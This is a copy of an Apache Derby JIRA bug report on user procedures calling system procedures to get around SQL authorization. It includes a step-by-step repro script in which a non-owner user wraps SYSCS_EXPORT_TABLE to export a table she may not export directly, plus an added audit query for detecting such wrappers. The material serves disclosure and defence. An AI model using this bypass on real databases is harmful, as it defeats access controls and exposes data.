Posted to derby-dev@db.apache.org by "Rick Hillegas (JIRA)" <ji...@apache.org> on 2014/06/17 15:37:02 UTC
[jira] [Updated] (DERBY-6616) User procedures can call system procedures, circumventing SQL authorization.
[ https://issues.apache.org/jira/browse/DERBY-6616?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Rick Hillegas updated DERBY-6616:
---------------------------------
Attachment: SystemProcWrapper.java
Attaching SystemProcWrapper.java, which contains a procedure wrapping SYSCS_UTIL.SYSCS_EXPORT_TABLE. The following script shows how to use this procedure to circumvent SQL authorization checks on the system procedure:
{noformat}
connect 'jdbc:derby:memory:db1;create=true;user=test_dbo';
call syscs_util.syscs_create_user( 'TEST_DBO', 'test_dbopassword' );
call syscs_util.syscs_create_user( 'RUTH', 'ruthpassword' );
-- shutdown in order to enable NATIVE authentication
connect 'jdbc:derby:memory:db1;shutdown=true';
connect 'jdbc:derby:memory:db1;user=test_dbo;password=test_dbopassword' as dbo;
create table t( a int );
insert into t values ( 1 );
grant select on t to public;
connect 'jdbc:derby:memory:db1;user=ruth;password=ruthpassword' as ruth;
-- ruth can't execute this procedure directly
call syscs_util.syscs_export_table( 'TEST_DBO', 'T', 'z.dat', null, null, null );
create procedure wrapSYSCS_EXPORT_TABLE
(
in schemaname varchar(128),
in tablename varchar(128),
in filename varchar(32672),
in columndelimiter char(1),
in characterdelimiter char(1),
in codeset varchar(128)
)
language java parameter style java reads sql data
external name 'SystemProcWrapper.wrapSYSCS_EXPORT_TABLE';
-- but she can execute this wrapper procedure
call wrapSYSCS_EXPORT_TABLE( 'TEST_DBO', 'T', 'z.dat', null, null, null );
{noformat}
> User procedures can call system procedures, circumventing SQL authorization.
> ----------------------------------------------------------------------------
>
> Key: DERBY-6616
> URL: https://issues.apache.org/jira/browse/DERBY-6616
> Project: Derby
> Issue Type: Bug
> Components: SQL
> Affects Versions: 10.11.0.0
> Reporter: Rick Hillegas
> Attachments: SystemProcWrapper.java
>
>
> System procedures are implemented as public static methods in org.apache.derby.catalog.SystemProcedures. These methods can be called by code in user-written procedures. This allows a user-written procedure to circumvent the SQL authorization checks which are supposed to limit some procedures to being called only by the DBO. I will attach a repro.
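The issue above means that, under SQL authorization, any Java routine a user has registered in their own schema is a potential path around the DBO-only checks on system procedures. An added audit query, not part of the JIRA issue or of Derby's own code, that a DBO can run to inventory every non-system procedure and function together with the external Java class it resolves to; it assumes the standard Derby catalog tables SYS.SYSALIASES (ALIAS, SCHEMAID, JAVACLASSNAME, ALIASTYPE, SYSTEMALIAS) and SYS.SYSSCHEMAS (SCHEMAID, SCHEMANAME, AUTHORIZATIONID):

```sql
-- Added audit query (assumption: standard Derby catalog column names).
-- Lists user-defined routines, i.e. the ones that could wrap a
-- DBO-only system procedure the way SystemProcWrapper does.
SELECT s.SCHEMANAME,
       s.AUTHORIZATIONID AS SCHEMA_OWNER,
       a.ALIAS           AS ROUTINE_NAME,
       a.ALIASTYPE,                 -- 'P' = procedure, 'F' = function
       a.JAVACLASSNAME              -- external Java class backing the routine
FROM SYS.SYSALIASES a
JOIN SYS.SYSSCHEMAS s ON a.SCHEMAID = s.SCHEMAID
WHERE a.SYSTEMALIAS = FALSE        -- skip Derby's own system routines
  AND a.ALIASTYPE IN ('P', 'F')
ORDER BY s.SCHEMANAME, a.ALIAS;
```

Run as the DBO, this turns the repro into a detection: the wrapper created by RUTH in the script above shows up as a row in schema RUTH whose JAVACLASSNAME is SystemProcWrapper, which a reviewer can then check against the jars and classes actually approved for the database's classpath.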
--
This message was sent by Atlassian JIRA
(v6.2#6252)